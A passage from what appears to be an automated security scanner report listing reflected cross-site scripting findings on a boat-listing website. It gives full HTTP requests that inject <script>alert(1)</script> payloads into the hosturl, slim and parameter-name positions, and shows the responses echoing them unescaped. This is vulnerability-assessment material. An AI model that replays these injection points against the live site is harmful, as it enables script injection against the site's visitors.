VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:19 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 18797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=donnellyyachtsa4560\\';alert(1)//866d6156778&&ywo=donnellyyachts&slim=broker&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url=\'>
...[SNIP]...

3.466. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 451e5"><script>alert(1)</script>b1bcffce91a was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts451e5"><script>alert(1)</script>b1bcffce91a&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:16 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 19165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<A href="/core/listing/pl_display_photo.jsp?slim=broker&&photo=21&boat_id=1787065&ybw=&boatname=32%27+Regulator+32+FS&hosturl=donnellyyachts451e5"><script>alert(1)</script>b1bcffce91a&photo_name=Photo+2">
...[SNIP]...

3.467. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55ee4'><script>alert(1)</script>80771513c34 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts55ee4'><script>alert(1)</script>80771513c34&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:17 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 19166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=donnellyyachts55ee4'><script>alert(1)</script>80771513c34&&ywo=donnellyyachts&slim=broker&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url='>
...[SNIP]...

3.468. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6ec"><script>alert(1)</script>38a243204a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts&&3b6ec"><script>alert(1)</script>38a243204a4=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:57:06 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href="../listing/photo_gallery.jsp?access=Public&slim=broker&ywo=donnellyyachts&ywo=donnellyyachts&hosturl=donnellyyachts&hosturl=donnellyyachts&listing_id=65891&units=Feet&3b6ec"><script>alert(1)</script>38a243204a4=1&boat_id=1787065&back=pl_boat_detail.jsp&boat_id=1787065">
...[SNIP]...

3.469. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b4a1'><script>alert(1)</script>3043d7ed361 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker2b4a1'><script>alert(1)</script>3043d7ed361&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
